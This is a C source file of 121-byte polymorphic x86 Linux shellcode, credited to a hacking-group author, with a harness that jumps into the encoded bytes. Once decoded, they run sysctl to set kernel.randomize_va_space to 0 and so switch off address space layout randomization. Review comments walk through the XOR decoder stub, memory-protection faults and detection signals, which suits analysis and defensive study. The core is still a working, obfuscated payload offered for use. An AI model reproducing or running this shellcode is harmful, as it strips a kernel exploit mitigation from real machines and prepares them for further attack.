/* sys_execve("/sbin/sysctl", { "/sbin/sysctl", "-w", "kernel.randomize_va_space=0" }, NULL);
* 121 bytes polymorphic shellcode
* Programmer : Paulus Gandung Prakosa_ (syn-attack)
* Thanks to : mywisdom, gunslinger_, nofia fitri, chaer.newbie, wenkhairu, ketek, xtr0nic,
* supermen ganteng, and all devilzc0de members
*/
/*
* Tested in :
* - BackTrack 5 (linux-2.6.38-generic)
* - Ubuntu 10.10 Maverick Meerkat (linux-2.6.38-generic)
* - Ubuntu 11.04 Natty Narwhal
* - Debian Squeeze 6.0.2 (linux-2.6.32-5-stable)
* Note : Be sure to disable ASLR (Address Space Layout Randomization) before
* placing and executing this shellcode
*/
#include <stdio.h>
#include <string.h>
/*
* null_space holds the 121 encoded bytes announced in the file header
* (twelve rows of ten bytes plus one trailing byte).
*
* NOTE(review): read as 32-bit x86, the first 20 bytes are a jmp/call/pop
* stub that XORs the following 0x65 (101) bytes in place with 0x7e, the key
* that main() prints; 20 + 101 = 121. Confirm against a disassembly.
*
* The stub writes into this array, so it can only run where the memory
* holding the array is both writable and executable. Where NX / W^X is
* enforced for data pages, the indirect call in main() is expected to fault.
*
* None of the bytes is 0x00, so strlen() in main() reports the full length.
*
* For detection: the effect named in the file header is an execve of
* /sbin/sysctl with "-w" and "kernel.randomize_va_space=0". That write
* needs root, and it shows up as that process execution and as a change to
* the value in /proc/sys/kernel/randomize_va_space.
*/
char null_space[] = "\xeb\x0d\x5e\x31\xc9\xb1\x65\x80\x36\x7e"
"\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff"
"\x4f\xbe\xfd\x92\x7f\xf6\x7a\x5a\x16\x1d"
"\x1b\x43\x4e\x16\x21\x0d\x0e\x1f\x16\x1b"
"\x21\x08\x1f\x16\x11\x13\x17\x04\x16\x0c"
"\x1f\x10\x1a\x16\x10\x1b\x12\x50\x18\x16"
"\x1b\x0c\xfd\x92\x7f\xb8\x7a\x5a\x15\xf7"
"\x98\xfd\x92\x7f\xf6\x7a\x5a\x18\x16\x53"
"\x09\xfd\x92\x7f\xf6\x7a\x5a\x16\x0d\x1d"
"\x0a\x12\x16\x10\x51\x0d\x07\x16\x51\x0d"
"\x1c\x17\xf7\x9d\x2e\x28\x2d\xce\x75\xf7"
"\x9f\x4f\xac\xb3\xfe\x4f\xbe\xce\x7f\xb3"
"\xfe";
/*
* Test harness: reports the XOR key and the encoded length, then transfers
* control to the bytes stored in null_space. Always returns 0 if control
* comes back from the call.
*
* The call target is a data array, so the outcome depends on the platform's
* memory protections. Where data pages are non-executable, the call is
* expected to fault rather than run the bytes.
*/
int main(void)
{
	/* strlen() stops at the first 0x00, so this equals the array length
	 * only while the encoded bytes contain no NUL. */
	const int encoded_len = strlen(null_space);
	/* Treat the array's address as a function taking unspecified arguments. */
	void (*entry)() = (void (*)())null_space;

	fputs("[+] Using key mutation engine : 0x7e\n", stdout);
	printf("[+] Length of this shellcode : %d bytes\n", encoded_len);
	fputs("[+] After executing this code, please check the value of \"/proc/sys/kernel/randomize_va_space\"\n", stdout);

	/* Control leaves C here; everything past this point is whatever the
	 * bytes in null_space decode to. */
	entry();

	return 0;
}
/* devilzc0de.org, hacker-newbie.org, sdf.lonestar.org, 1337day.com */